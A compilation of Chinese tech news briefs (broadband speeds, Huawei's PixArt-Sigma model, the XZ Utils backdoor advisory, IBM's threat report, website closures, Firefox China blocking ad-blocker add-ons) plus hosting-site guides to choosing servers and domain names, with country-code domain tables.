据央视财经消息,国资委数据显示,中国电信、中国联通、中国移动提前超额完成提速降费专项任务,全年累计让利超过 1200 亿元。 宽带发展联盟发布的《中国宽带速率状况报告》显示, 2018 年第三季度中国固定宽带网络平均下载速率达到24.99Mb/s,已逼近25Mb/s,同比提升52.4%;移动宽带用户使用4G网络访问互联网时的平均下载速率达21.46Mb/s,同比提升39.3%,我国网速已进入全球第一梯队。 #### 厉害!华为发布图像生成模型PixArt-\Sigma 可直出4K图像 3月8日 消息:华为近日发布了一项名为 PixArt-\Sigma 的图像生成模型,该模型采用了 DiT 架构,可以直接生成4K 分辨率的图像。相比于其前身 PixArt-\alpha,PixArt-\Sigma 在图像保真度上有了明显的提升,并改善了与文本提示的一致性。 项目地址:https://pixart-alpha.github.io/PixArt-sigma-project/ PixArt-\Sigma 的一个关键特点是其训练效率。借助 PixArt-\alpha 的基础预训练,它通过整合更高质量的数据,从"较弱"的基线逐步演变为"较强"的模型,这个过程被称为"弱到强训练"。PixArt-\Sigma 的进步主要体现在两个方面:高质量的训练数据和高效的 Token 压缩。PixArt-\Sigma 结合了更高质量的图像数据,配对更精确和详细的图像标题,同时在 DiT 框架内提出了一个新的注意力模块,可以压缩键(Key)和值(Value),显著提高效率,促进超高分辨率图像的生成。 由于这些改进,PixArt-\Sigma 以较小的模型规模(6亿参数)实现了优于现有文本到图像扩散模型(如 SDXL(26亿参数)和 SD Cascade(51亿参数))的图像质量和用户提示遵从能力。 此外,PixArt-\Sigma 能够生成4K 图像,为创建高分辨率海报和壁纸提供了支持,有效地增强了电影和游戏等行业中高质量视觉内容的制作。 #### 压缩工具 XZ 被曝后门,红帽、Debian 等发公告要求紧急停用 据 DoNews 报道,Linux 圈近期发生了一起重大安全事件,主流压缩工具 XZ 被曝出存在后门。该事件引起了广泛关注,包括红帽、Debian 在内的多家知名机构已经发布了安全公告,要求用户紧急停用可能受到影响的 XZ 工具版本。 详细情况 具体来说,Red Hat 公司在最新的 XZ Utils 数据压缩工具和库中发现了一个后门,并敦促用户立即停止使用 Fedora 开发和实验版本。该公司警告称,用户应立即停止在工作或个人活动中使用任意 Fedora 41 或者 Fedora RAWHIDE 实例。目前排查结果显示 Red Hat Enterprise Linux(RHEL)没有任何版本受到影响。 此外,Debian 安全团队也在适用于 Debian unstable(Sid)发行版的 XZ5.6.x版本中找到了相关证据,证明存在后门,可以注入相关代码。在受影响的 Debian 测试版、不稳定版和实验版中,XZ 已被还原为上游的 5.4.5 代码。 安全影响 微软软件工程师安德烈斯・弗罗因德(Andres Freund)在一台 Linux 盒子上调查 Debian Sid(Debian 发行版的滚动开发版本) SSH 登录缓慢问题时,发现了这个安全问题。他发现 XZ 格式压缩实用程序 xz-utils 的上游源代码压缩包已被破解,并在构建时向生成的 liblzma5 库中注入恶意代码。尽管弗罗因德表示目前并未找到在 XZ 5.6.0 和 5.6.1 版本中添加恶意代码的确切目的,但这一供应链安全问题已经被 Red Hat 跟踪,并将其严重性评分定为 10/10。 应对措施 为了解决这个问题,Red Hat 正在跟踪这一供应链安全问题,将其命名为 CVE-2024-3094,并将其严重性评分定为 10/10。同时,Fedora 40 测试版中已恢复使用5.4.x版本的 XZ。对于其他可能受到影响的系统,用户需要及时更新或卸载可能存在问题的 XZ 工具版本,以防止潜在的安全风险。 总的来说,这次事件再次提醒了我们在使用开源软件时需要注意的安全问题,尤其是对于那些核心组件,我们需要更加谨慎地对待其安全性。 #### 原创文章1:网站建设如何选择服务器空间详解 我们都知道服务器空间是SEO的基础,好的服务器空间可以大大提升网站排名,本篇文章向我们讲述了如何网站服务器空间相关信息,如何选择需要根据自己的网站使用情况,以下希望大家了解下。   一,什么是空间 所谓的空间,其实就是存放网站内容的服务器,而这个服务器需要放在国内大型数据中心连通互联网,这样人家才可以访问到你的网站文件。 二,服务器的适用性 服务器有很多种,像我们新手站长所说的虚拟主机就是服务器通过虚拟化软件分配出来的一个适合于网站使用的空间,非常适合新手站长使用。还有VPS主机、独立服务器、云服务器等都是网站服务器需要用到的种类。那么我们如何来选用适合自己的服务器呢? 首先,根据网站的发展和资金投人情况,选择主机类型。如果是个人网站可使用虚拟主机,价格便宜,操作简单,不需要什么担心服务器被入侵啥的。这就好比单身公寓,房间小只适合一个人住,而且一层楼住得很多人,会很拥挤,所以虚拟主机虽然便宜,但是它的是速度不是很快。 VPS主机是一台独立的服务器通过虚拟化软件分配出来的虚拟服务器,有自己的操作系统,独享CPU、内存、宽带等,网站主可以根据自己网站需要的环境安装,就像小区,一层楼就几户人家,不会感觉到拥挤,住着也舒服,当然了如果VPS里的几个用户都是流量大户,甚至有被人家攻击的现象,还是会影响到你的,所以VPS适合于中小型网站使用。 独立服务器有租用和托管两种形式,租用服务器是指租用IDC服务商托管在数据中心的服务器,而托管就是你自己把配置好的服务器托管放至到数据中心上,独立服务器就好比一幢大别墅,要多宽敞有多宽敞,当然了住得大了维护起来也是挺麻烦的,所以独立服务器的有点就在于你接入多少资源,就享有多少资源。比如我接入10M宽带,那这宽带却是实打实的,但维护起来不是很方便,独立服务器适用于对网站速度稳定性要求很高而且网站流量很高的用户。 云服务器其实VPS主机有点类似,云服务器是通过云服务软件整合多台服务器资源,使之达到资源有效利用的目地,部署快,一般上架5分钟就可以开一台云服务器,维护方便,可以通过控制面板实现重启、关机等。安全,云服务器比其它以上种类的服务器都安全,原因是其不管是哪台服务器故障都可以快速转移数据,不怕数据丢失,而且一般云服务商都有自动备份功能,非常安全。所以目前云服务器在各大网站都比较受欢迎,因为他几乎集成了站长对服务器的所有要求,除了价格上比较贵。 讲到服务器的适合性,那我们来看下选择服务器事要参考的一些其它因素。 1,备案 网站备案是国内工信部对国内服务器接入网站的一种约束,但凡使用国内机房的网站都必须按照相关规定进行备案审理。备案其实很简单,只要内容正规不违法,其实备案起来非常简单,拍照写表单而以,但审核起来较久,有些审核一般15天左右,严重影响了网站上线时间。这也是曾有一位站长抱怨说“谁想出的备案政策,给我出来,我保证不打死他”,因为备案其实卡住了很多人使用国内服务器的权利,至于那些卡住的,你懂的,无非是有些灰灰的…… 2,速度 国内的用户访问国内网站的速度是比较快的,因为距离比较近。但如果经营外贸业务,用国内服务器的话由于国家与国家间的宽带其实是封闭性的,导致国内用户访问国外网站是非常慢的,甚至有时候访问不了,所以做外贸的要选择这个国家的本土服务器比较好,假如我做的是日本网站,那么网站服务器选日本的比较好,而做美国的外贸的也一样。有一点需要说明的是国内与香港由于不是国家,而且互联网存在很大的互通性,所以不想备案,又想速度快的,选择香港服务器是不错的选择。 3.  稳定性 网站经常访问不了不仅影响用户体验,也影响了搜索引擎的对网站的评分,因些选择稳定的服务器尤为重要。稳定的服务器参考首先我们要看机房,电信级数据中心是稳定顶级的,比如一些省级的电信数据中心,这些就代表国家,所以稳定性非常高,排除一些正常的维护外,骨干电信数据中心一年也不会出现过几次故障,甚至几年都没有。其次是民营大型数据中心,这些是所谓的二级代理,就是从电信、联通、移动这些数据中心拉来的宽带然转卖,比如阿里云、腾讯云本身自己建机房,把基础运营商的宽带拉过来,由于腾讯阿里比较土豪,所以宽带高,稳定性足,而且不却技术。最后是些中小型机房,比如景安机房、小鸟云的大连机房,稳定性中规中矩。除开机房因素外我们还要参考服务商的实力,像腾讯、阿里、百度这些本身技术实力非常强,卖的产品也会非常稳定。而那些小公司技术就几个,出了问题解决半天都解决不了谈何稳定?而且有些小公司为了赚多点钱接那些易被攻击的网站,那些网站跟你放同一个服务器或者一个网络上,如果被攻击会影响到你的网站。所以选服务商千万别选不正规的服务商,哪怕他卖得再便宜。 3,机房环境与带宽 国内有电信、联通、移动三大顶级数据中心运营商,考虑到电信联通占据主要市场,所以IDC服务器大多是提供纯电信或者纯联通的服务器接入,当然也有一些自建机房的服务商提供BGP融合了各大电信运营商的线路,比如阿里云、腾讯云这些都是BGP多线的代表,但BGP多线的服务器价格相比纯单线的服务器价格要贵出好几倍,而且宽带普遍较小。而且纯电信的服务器宽带大,价格便宜。这也是我们看到一些做服务器租用的100M独享的服务器也才78百一个月而以,而BGP的100M独享没有56千拿不下来。选择海外机房做外贸的我们只要考虑服务器接入的本地宽带多少就行,像一些托管服务器都会有什么100M本地宽带接入,G口接入,其实就是说本地宽带100M、1G等。而选用海外服务器用来给国内用户访问的就要注意啦,我们要考虑到这台服务器的接入出口宽带多少,就是出口到国内的宽带,比如香港服务器一般普遍为2M3M最高也就5M左右,非常小,所以香港服务器不适用于流量非常大的网站,因为出口宽带是非常昂贵的。 4,价格 虚拟主机比较便宜,几十到几百都有,甚至有些服务商免费提供虚拟主机,当然了,免费的肯定不适全于长久做站的。虚拟主机到达上千块一年的话除非某些特别必要,要不然可以考虑换VPS或者云服务器了。因为同样一千多块可以买到不错配置的云服务器了,前提是你会玩云服务器。独立服务器对于一些宽带配置要求非常高的用户,而且不是土豪型的站长使用,因为独立服务器普遍在2000以内一个月,就可以得到8核8G,独享10M以上的配置。而云服务器2000以内一个月根本开不起这么高的配置。需要注意的是,国内服务商卖国外服务器是比国外服务商卖国外服务器要贵的,而且贵很多,所以你懂英语、或者这个海外服务商懂有中文客服,那么买海外服务器还是在海外服务商买的便宜,当然一定要知名企业,否则海外是很难投诉的。而国外服务商是几乎没有卖国内服务器,除微软云和亚马逊云外,因为国外服务商进入国内云服务市场门槛是非常高的,所以海外服务商卖国内服务器几乎没什么优势,这也是国内市场几乎没有海外服务商生存的机会。 好了以上就是主机吧对网站服务器的选择的一些见解,希望可以帮到大家。   #### 原创文章2:网站建设如何选择域名 我们都知道域名很重要,好的域名不仅易于推广,而且有利于SEO排名,本篇文章像大家介绍如何选择域名。 一,什么是域名 域名(英语:Domain Name),简称域名、网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)。 这是官方说法,我们简单把域名比喻成是互联网的门牌号,有了这个门牌号别人可以找到访问我们的网站,而且这个门牌号还是全球唯一的,所以域名选择非常重要。 二、如何选择域名 由于域名的全球唯一性,所以很多人看清楚了其中的商机,已经把很多好的域名注册完了,对于域名选择主机吧有几点经验: 1.域名后缀 我们必须知道全球有80%的网站都是使用COM域名后缀,而COM在国内甚至达到90%以上,那么考虑到用户习惯我们首先必须使用COM域名为后缀,其次是CN域名,在国内CN域名也是非常受欢迎的,至少使用CN域名不会让别人觉得这个网站是垃圾,再后就是NET、ORG,千万别选COM.CN这些,很容易让人搞混。后缀最大禁忌是使用一些新出的顶级域名后缀,比如.APP、.wang这类的,虽然后缀好记,但不利于SEO,甚至有些浏览器是不支持识别码的,非得加下http:才可以访问,这无形中增加了用户访问门槛。 2.域名好记 在以COM、.CN这些主流域名为后缀的基础上,不管你域名有多长,前提一定要好记,三拼、英文数字组合都可以,只要念得顺就是好域名。 3.域名较短 考虑到美观问题,在以上的基础上,一定要仅量短,三拼域名是网友能接受的最大限度,也就是域名长度不能超过9位数,超过9位数就影响网站在浏览器上的显示美观了。虽然搜索引擎并不排斥长域名,但越短的域名权重也是会越高的。 4.域名相关性 以在上的基础上,选取域名一定要跟你要做的网站内容相关,比如你是卖手机的,如果你能注册到拥有shouji.com,那么你已经赢了一半了。因为不仅能让客户第一眼就记住你的域名,同时还知道你网站是卖啥的。 5. 品牌相关 在以上的基础上,如果没有相关性我们退求其次可以选择品牌相关的域名,比如像网站名淘宝取taobao,公司名为爱凤,那么取aifeng,ifeng等都可以。品牌做好了,别人一想到某某行业,就想到这个品牌。当然品牌是最难做的,所以主机吧把他放最后。有实力的可以把品牌放第一页,比如小米为了mi.com花了几千万,为何?其实就是他们有实力,品牌是放第一位,几千万对于大品牌来说是值得的。 好了,以上就是主机吧对网站建设中选取域名的一些经验所得,希望可以帮到大家。 下面是一些域名后缀的含义表,大家在选域名的时候可以参考下。 国际域名   域名后缀 含义 .com 商业机构,任何人都可以注册 .edu 教育机构 .gov 政府部门 .int 国际组织 .mil 美国军事部门 .net 网络组织,例如因特网服务商和维修商,现在任何人都可以注册 .org 非盈利组织,任何人都可以注册 .biz 商业 .info 网络信息服务组织 .pro 用于会计、律师和医生 .name 用于个人 .museum 用于博物馆 .coop 用于商业合作团体 .aero 用于航空工业 .xxx 用于成人、色情网站 .idv 用于个人 国家域名 国家域名按国家地区名称的汉语拼音排列。 A - B - C - D - E - F - G - H - I - J - K - L - M - N - O - P - Q - R - S - T - U - V - W - X - Y - Z A 阿尔巴尼亚 .al 阿尔及利亚 .dz 阿富汗 .af 阿根廷 .ar 阿拉伯联合酋长国 .ae 阿鲁巴 .aw 阿曼 .om 阿塞拜疆 .az 埃及 .eg 埃塞俄比亚 .et 爱尔兰 .ie 爱沙尼亚 .ee 安道尔 .ad 安哥拉 .ao 安圭拉 .ai 安提瓜和巴布达 .ag 奥地利 .at 澳大利亚 .au 澳门地区 .mo B 巴巴多斯 .bb 巴布亚新几内亚 .pg 巴哈马 .bs 巴基斯坦 .pk 巴拉圭 .py 巴勒斯坦 .ps 巴林 .bh 巴拿马 .pa 巴西 .br 白俄罗斯 .by 百慕大 .bm 保加利亚 .bg 北马里亚纳群岛 .mp 贝宁 .bj 比利时 .be 冰岛 .is 波多黎各 .pr 波斯尼亚和黑塞哥维那 .ba 波兰 .pl 玻利维亚 .bo 伯利兹 .bz 博茨瓦纳 .bw 不丹 .bt 布基纳法索 .bf 布隆迪 .bi 布维岛 .bv C 朝鲜 .kp 赤道几内亚 .gq D 丹麦 .dk 德国 .de 东帝汶 .tl (新域名); .tp (旧域名,尚未停用) 多哥 .tg 多米尼克 .dm 多米尼加共和国 .do E 俄罗斯 .ru 厄瓜多尔 .ec 厄立特里亚 .er F 法国 .fr 法罗群岛 .fo 法属波利尼西亚 .pf 法属圭亚那 .gf 法属南部领土 .tf 梵蒂冈 .va 菲律宾 .ph 斐济 .fj 芬兰 .fi 佛得角 .cv 福克兰群岛 .fk G 冈比亚 .gm 刚果 .cg 刚果民主共和国 .cd 哥伦比亚 .co 哥斯达黎加 .cr 格恩西岛 .gg 格林纳达 .gd 格陵兰 .gl 格鲁吉亚 .ge 古巴 .cu 瓜德罗普 .gp 关岛 .gu 圭亚那 .gy H 哈萨克斯坦 .kz 海地 .ht 韩国 .kr 荷兰 .nl 荷属安地列斯群岛 .an 赫德和麦克唐纳群岛 .hm 洪都拉斯 .hn J 基里巴斯 .ki 吉布提 .dj 吉尔吉斯斯坦 .kg 几内亚 .gn 几内亚比绍 .gw 加拿大 .ca 加纳 .gh 加蓬 .ga 柬埔寨 .kh 捷克共和国 .cz 津巴布韦 .zw K 喀麦隆 .cm 卡塔尔 .qa 开曼群岛 .ky 科摩罗 .km 科特迪瓦 .ci 科威特 .kw 可可群岛 .cc 克罗地亚 .hr 肯尼亚 .ke 库克群岛 .ck L 拉脱维亚 .lv 莱索托 .ls 老挝 .la 黎巴嫩 .lb 立陶宛 .lt 利比里亚 .lr 利比亚 .ly 列支敦士登 .li 留尼汪 .re 卢森堡 .lu 卢旺达 .rw 罗马尼亚 .ro M 马达加斯加 .mg 马恩岛 .im 马尔代夫 .mv 马耳他 .mt 马拉维 .mw 马来西亚 .my 马里 .ml 马其顿 .mk 马绍尔群岛 .mh 马提尼克岛 .mq 马约特岛 .yt 毛里求斯 .mu 毛里塔尼亚 .mr 美国 .us 美国本土外小岛屿 .um 美属萨摩亚 .as 美属维尔京群岛 .vi 蒙古 .mn 蒙特塞拉特岛 .ms 孟加拉国 .bd 秘鲁 .pe 密克罗尼西亚联邦 .fm 缅甸 .mm 摩尔多瓦 .md 摩洛哥 .ma 摩纳哥 .mc 莫桑比克 .mz 墨西哥 .mx N 瑙鲁 .nr 尼泊尔 .np 尼加拉瓜 .ni 尼日尔 .ne 尼日利亚 .ng 纽埃岛 .nu 挪威 .no 诺福克岛 .nf 纳米比亚 .na 南非 .za 南极洲 .aq 南乔治亚岛和南桑德韦奇岛 .gs O 欧洲联盟 .eu P 帕劳 .pw 皮特凯恩群岛 .pn 葡萄牙 .pt R 日本 .jp 瑞典 .se 瑞士 .ch S 萨尔瓦多 .sv 萨摩亚 .ws 塞尔维亚和黑山 .yu 塞拉利昂 .sl 塞内加尔 .sn 塞浦路斯 .cy 塞舌尔 .sc 沙特阿拉伯 .sa 圣诞岛 .cx 圣多美和普林西比 .st 圣赫勒拿岛 .sh 圣基茨和尼维斯 .kn 圣卢西亚 .lc 圣马力诺 .sm 圣皮埃尔岛及密客隆岛 .pm 圣文森特和格林纳丁斯 .vc 斯里兰卡 .lk 斯洛伐克 .sk 斯洛文尼亚 .si 斯瓦尔巴岛和扬马延岛 .sj 斯威士兰 .sz 苏丹 .sd 苏里南 .sr 所罗门群岛 .sb 索马里 .so T 塔吉克斯坦 .tj 台湾 .tw 泰国 .th 坦桑尼亚 .tz 汤加 .to 特克斯和凯科斯群岛 .tc 特立尼达和多巴哥 .tt 突尼斯 .tn 图瓦卢 .tv 土耳其 .tr 土库曼斯坦 .tm 托克劳 .tk W 瓦利斯和富图纳群岛 .wf 瓦努阿图 .vu 危地马拉 .gt 委内瑞拉 .ve 文莱 .bn 乌干达 .ug 乌克兰 .ua 乌拉圭 .uy 乌兹别克斯坦 .uz X 西班牙 .es 西撒哈拉 .eh 希腊 .gr 香港地区 .hk 新加坡 .sg 新喀里多尼亚 .nc 新西兰 .nz 匈牙利 .hu 叙利亚 .sy Y 牙买加 .jm 亚美尼亚 .am 亚森松岛 .ac 也门 .ye 伊拉克 .iq 伊朗 .ir 以色列 .il 意大利 .it 印度 .in 印度尼西亚 .id 英国 .uk 英属维尔京群岛 .vg 英属印度洋地区 .io 约旦 .jo 越南 .vn Z 赞比亚 .zm 泽西岛 .je 乍得 .td 直布罗陀 .gi 智利 .cl 中非共和国 .cf 中国 .cn 国家域名 (按国家、地区的域名顺序排列) A - B - C - D - E - F - G - H - I - J - K - L - M - N - O - P - Q - R - S - T - U - V - W - X - Y - Z A .ac 亚森松岛 .ad 安道尔 .ae 阿拉伯联合酋长国 .af 阿富汗 .ag 安提瓜和巴布达 .ai 安圭拉 .al 阿尔巴尼亚 .am 亚美尼亚 .an 荷属安地列斯群岛 .ao 安哥拉 .aq 南极洲 .ar 阿根廷 .as 美属萨摩亚 .at 奥地利 .au 澳大利亚 .aw 阿鲁巴 .az 阿塞拜疆 B .ba 波斯尼亚和黑塞哥维那 .bb 巴巴多斯 .bd 孟加拉国 .be 比利时 .bf 布基纳法索 .bg 保加利亚 .bh 巴林 .bi 布隆迪 .bj 贝宁 .bm 百慕大 .bn 文莱 .bo 玻利维亚 .br 巴西 .bs 巴哈马 .bt 不丹 .bv 布维岛 .bw 博茨瓦纳 .by 白俄罗斯 .bz 伯利兹 C .ca 加拿大 .cc 可可群岛 .cd 刚果民主共和国 .cf 中非共和国 .cg 刚果 .ch 瑞士 .ci 科特迪瓦 .ck 库克群岛 .cl 智利 .cm 喀麦隆 .cn 中国大陆 .co 哥伦比亚 .cr 哥斯达黎加 .cu 古巴 .cv 佛得角 .cx 圣诞岛 .cy 塞浦路斯 .cz 捷克共和国 D .de 德国 .dj 吉布提 .dk 丹麦 .dm 多米尼克 .do 多米尼加共和国 .dz 阿尔及利亚 E .ec 厄瓜多尔 .ee 爱沙尼亚 .eg 埃及 .eh 西撒哈拉 .er 厄立特里亚 .es 西班牙 .et 埃塞俄比亚 .eu 欧洲联盟 F .fi 芬兰 .fj 斐济 .fk 福克兰群岛 .fm 密克罗尼西亚联邦 .fo 法罗群岛 .fr 法国 G .ga 加蓬 .gd 格林纳达 .ge 格鲁吉亚 .gf 法属圭亚那 .gg 格恩西岛 .gh 加纳 .gi 直布罗陀 .gl 格陵兰 .gm 冈比亚 .gn 几内亚 .gp 瓜德罗普 .gq 赤道几内亚 .gr 希腊 .gs 南乔治亚岛和南桑德韦奇岛 .gt 危地马拉 .gu 关岛 .gw 几内亚比绍 .gy 圭亚那 H .hk 香港 .hm 赫德和麦克唐纳群岛 .hn 洪都拉斯 .hr 克罗地亚 .ht 海地 .hu 匈牙利 I .id 印度尼西亚 .ie 爱尔兰 .il 以色列 .im 马恩岛 .in 印度 .io 英属印度洋地区 .iq 伊拉克 .ir 伊朗 .is 冰岛 .it 意大利 J .je 泽西岛 .jm 牙买加 .jo 约旦 .jp 日本 K .ke 肯尼亚 .kg 吉尔吉斯斯坦 .kh 柬埔寨 .ki 基里巴斯 .km 科摩罗 .kn 圣基茨和尼维斯 .kp 朝鲜 .kr 韩国 .kw 科威特 .ky 开曼群岛 .kz 哈萨克斯坦 L .la 老挝 .lb 黎巴嫩 .lc 圣卢西亚 .li 列支敦士登 .lk 斯里兰卡 .lr 利比里亚 .ls 莱索托 .lt 立陶宛 .lu 卢森堡 .lv 拉脱维亚 .ly 利比亚 M .ma 摩洛哥 .mc 摩纳哥 .md 摩尔多瓦 .mg 马达加斯加 .mh 马绍尔群岛 .mk 马其顿 .ml 马里 .mm 缅甸 .mn 蒙古 .mo 中国澳门 .mp 北马里亚纳群岛 .mq 马提尼克岛 .mr 毛里塔尼亚 .ms 蒙特塞拉特岛 .mt 马耳他 .mu 毛里求斯 .mv 马尔代夫 .mw 马拉维 .mx 墨西哥 .my 马来西亚 .mz 莫桑比克 N .na 纳米比亚 .nc 新喀里多尼亚 .ne 尼日尔 .nf 诺福克岛 .ng 尼日利亚 .ni 尼加拉瓜 .nl 荷兰 .no 挪威 .np 尼泊尔 .nr 瑙鲁 .nu 纽埃岛 .nz 新西兰 O .om 阿曼 P .pa 巴拿马 .pe 秘鲁 .pf 法属波利尼西亚 .pg 巴布亚新几内亚 .ph 菲律宾 .pk 巴基斯坦 .pl 波兰 .pm 圣皮埃尔岛及密客隆岛 .pn 皮特凯恩群岛 .pr 波多黎各 .ps 巴勒斯坦 .pt 葡萄牙 .pw 帕劳 .py 巴拉圭 Q .qa 卡塔尔 R .re 留尼汪 .ro 罗马尼亚 .ru 俄罗斯 .rw 卢旺达 S .sa 沙特阿拉伯 .sb 所罗门群岛 .sc 塞舌尔 .sd 苏丹 .se 瑞典 .sg 新加坡 .sh 圣赫勒拿岛 .si 斯洛文尼亚 .sj 斯瓦尔巴岛和扬马延岛 .sk 斯洛伐克 .sl 塞拉利昂 .sm 圣马力诺 .sn 塞内加尔 .so 索马里 .sr 苏里南 .st 圣多美和普林西比 .sv 萨尔瓦多 .sy 叙利亚 .sz 斯威士兰 T .tc 特克斯和凯科斯群岛 .td 乍得 .tf 法属南部领土 .tg 多哥 .th 泰国 .tj 塔吉克斯坦 .tk 托克劳 .tl 东帝汶(新域名) .tm 土库曼斯坦 .tn 突尼斯 .to 汤加 .tp 东帝汶(旧域名,尚未停用) .tr 土耳其 .tt 特立尼达和多巴哥 .tv 图瓦卢 .tw 台湾 .tz 坦桑尼亚 U .ua 乌克兰 .ug 乌干达 .uk 英国 .um 美国本土外小岛屿 .us 美国 .uy 乌拉圭 .uz 乌兹别克斯坦 V .va 梵蒂冈 .vc 圣文森特和格林纳丁斯 .ve 委内瑞拉 .vg 英属维尔京群岛 .vi 美属维尔京群岛 .vn 越南 .vu 瓦努阿图 W .wf 瓦利斯和富图纳群岛 .ws 萨摩亚 Y .ye 也门 .yt 马约特岛 .yu 塞尔维亚和黑山 .yr 耶纽 Z .za 南非 .zm 赞比亚 .zw 津巴布韦 .cn 地域域名 .cn 地域域名是保留下来的带有城市、国家后缀的域名。个人无法注册。   .ac.cn 科学院系统 .ah.cn 安徽省 .bj.cn 北京市 .com.cn 商业系统 .cq.cn 重庆市 .fj.cn 福建省 .gd.cn 广东省 .gov.cn 政府部门 .gs.cn 甘肃省 .gx.cn 广西自治区 .gz.cn 贵州省 .ha.cn 河南省 .hb.cn 湖北省 .he.cn 河北省 .hi.cn 海南省 .hk.cn 香港 .hl.cn 黑龙江省 .hn.cn 湖南省 .jl.cn 吉林省 .js.cn 江苏省 .jx.cn 江西省 .ln.cn 辽宁省 .mo.cn 澳门 .net.cn 邮电部门 .nm.cn 内蒙古自治区 .nx.cn 宁夏回族自治区 .org.cn 社会组织   #### 厦门国际网络要起飞,国际互联网数据专用通道获批建设 初期将达120G带宽 5月10日消息:据福建省通信管理局网站消息,近日,工业和信息化部正式批复同意建设厦门国际互联网数据专用通道。据了解,国际互联网数据专用通道是一种国际关口的专用链路,方便数据互通,提高速率并降低丢包率。 据了解,该专用通道是福建省首条通达我国国际通信出入口局的直连高速通道,并首次以「1+2+N」模式(市级区域统一申报、以中国(福建)自由贸易试验区厦门片区和厦门国家火炬高新区为核心,覆盖所辖多个园区)进行建设。 专用通道建成后,初期将达到120G带宽能力,通过独立于公众网的专用网络,快速直达北上广国际通信出入口局,不仅可减少原先的多节点分层汇聚,而且不受国内公众互联网流量的干扰和影响,在降低往返访问时延和丢包率、推动国际互联网访问性能方面效果显著,可有力提升厦门对国际金融服务、跨境电子商务、跨境物流、跨国制造、国际文化交流的通信服务能力,为企业吸纳国际优质资本拓展海外市场,加快国际化发展步伐提供有力支撑,为厦门更高水平建设高素质高颜值现代化国家化城市服务。 #### 去年利用身份信息的网络攻击激增 71% 根据IBM发布的2024年《X-Force威胁情报指数报告》,去年利用身份信息的网络攻击激增了71%4。这份报告是由IBM Consulting咨询服务的进攻性与防御性安全服务部门X-Force编写的,基于每天从130个国家和地区检测到的超过1500亿个安全事件。 报告中指出,攻击者使用的信息窃取恶意软件数量增长了266%。这种基于身份信息的攻击难以应对,安全团队针对其引起的重大安全事件,需要采取的应对措施在复杂度上是一般原因事件的3倍。 此外,报告还提到,2023年全球近70%的攻击以关键基础设施为目标,在这一类型攻击中,有近85%的案例可通过“基本安全”措施降低损失,这意味着“基本安全”可能比安全业内人士认为的要难以实现。 对于行业热点AI,IBM表示当前攻击者尚不能从对生成式AI的攻击中获得回报,但其确实是下一个需要保障的重要领域。根据IBM的预测,一旦生成式AI市场的主导格局明确,则可能会促使网络犯罪分子进一步投资新的攻击工具,并针对相关AI平台进行大规模攻击。 #### 去年境外计算机恶意攻击主要来源来自美国 11 日,国家互联网应急中心发布的《 2019 年中国互联网网络安全报告》显示,去年捕获计算机恶意程序样本超过 6200 万个,日均传播次数达 824 万余次;其中境外来源的恶意攻击主要来自美国,比例为53.5%。 #### 去年网信办关闭1370家网站 近日,根据网信办公布的消息,全国网信系统2017年依法约谈网站2003家,暂停更新网站1370家。可以看出全国网信行政执法工作也卓有成效。 据统计,除约谈暂停更新的网站达数千家外,会同电信主管部门取消违法网站许可或备案、关闭违法网站22587家,移送司法机关相关案件线索2045件。相关网站依据服务协议关闭各类违法违规账号群组317万余个。 其主要整改与严查离不开以下3个方面: 1.从严查处各类网上违法违规行为和网站:涉嫌传播危害国家安全信息的,违法从事经营的;传播虚假淫秽色情信息的直播网站和APP,违法聚众赌博及侵权的网站。 2.全力查处一批有影响力典型案件: 例如针对新闻报道引发公众关注的BOSS直聘网站涉李文星求职陷传销组织蹊跷死亡、360智能摄像头“水滴直播”等事件。 3.针对突出问题加大约谈、处罚力度: 各地网信办相继约谈一批违规网站;处理传播淫秽色情、庸俗低俗、封建迷信信息等问题,责令其限期整改。 根据《网络安全法》,互联网开展“清朗”“剑网”“网上扫黄打非”等专项行动,将会加大约谈、处罚力度。网信部门对网站的审查也将会更加严格、规范! #### 去广告插件或凉凉 不论Chrome还是FireFox火狐浏览器,最受欢迎的插件中必然会有一些去广告插件,然而这几天风向变了,一家很小众的安卓浏览器神奇浏览器因为被视频网站起诉而宣布破产,现在火狐中国版也突然屏蔽了多个去广告插件的下载。 从网友的爆料来看,使用火狐中国版的用户现在已经无法使用一些知名的去广告插件,包括uBlock Origin、AdGuard AdBlocker、AdBlock For Firefox、AdNauseam等等,用户在插件商店访问这些插件,会显示 此页面在您的地区不可用” 的提示信息。 火狐并没有提及限制去广告插件下载的原因,不过结合神奇浏览器被起诉而破产、停运的情况来看,后者提到的是某酷、某讯,应该是国内的几家视频网站巨头开始行动起来,用法律手段封杀这些去广告插件甚至浏览器。 在这个问题上,火狐中国版也不是第一次遭遇巨头们的起诉了,早在2017、2018年,北京谋智火狐信息技术有限公司(Mozilla在中国的全资子公司)就曾因广告拦截被国内多家企业起诉过,判决在2019年生效,但不确定跟这次的情况是否有直接关系。 值得欣慰的是,目前被下架的一些去广告插件就这4款,更常用的Adblock Plus似乎躲过一劫,去广告之外的其他类型插件也没有被屏蔽。 #### 又一“陪”服务关闭 “快陪练”APP宣布将停止“真人陪练业务” 9月23日 消息:不久前,真人1对1钢琴陪练平台“快陪练”APP宣布将停止“真人陪练业务”,称仅保留人工智能陪练课程为用户提供服务。 为此,“快陪练”给出解决方案称,会为用户提供相应的AI智能陪练课程进行兑换和补偿,同时已与二十余家知名教育品牌达成合作,将为另外10%的非钢琴类用户和有其他学习需求的用户,提供除AI陪练课之外的更多综合课程兑换选择。 快陪练表示,用户可根据剩余课程情况,自由选择所兑换的课程项目。可兑换课程包含:快陪练智能陪练课程半年卡/年卡/两年卡及其他二十余家教育机构不同种类的教育项目,如编程、声乐、美术、科学、围棋、阅读、留学等。 此外,快陪练还强调,其并没有跑路,仍在竭心尽力解决家长们的问题,但短期内难以退费。 据快陪练于9月21日公布的数据显示,截止2021年9月19日其已累计为10000+用户兑换课程。 #### 又一个投资买中文域名的站长哭晕在厕所 起因是这位站长买了将近200多个中文域名,现在过期了,没人要,只能过期作废处理。 主机吧看了下,他注册的中文域名几乎都是一些商业词,应该是注册来做投资的,结果砸手里了。 中文域名虽然看着很美,但是不会有谁在浏览器上输入中文.com这种输入法的,人家没这个习惯,况且中文域名不适合做搜索引擎优化,除了百度收录少量的中文域名外,其它的搜索引擎根本不收录这类的中文域名,因此,中文域名本身没什么商业价值,连一些知名品牌都不注册自己的中文域名,可见中文域名有多被嫌弃。 